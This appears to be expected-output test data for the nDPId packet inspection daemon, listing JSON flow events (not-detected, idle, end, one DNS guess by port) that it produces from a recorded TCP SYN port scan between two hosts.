-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00746{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275056276,"flow_last_seen":1278275077368,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275060291,"flow_last_seen":1278275060352,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":70,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
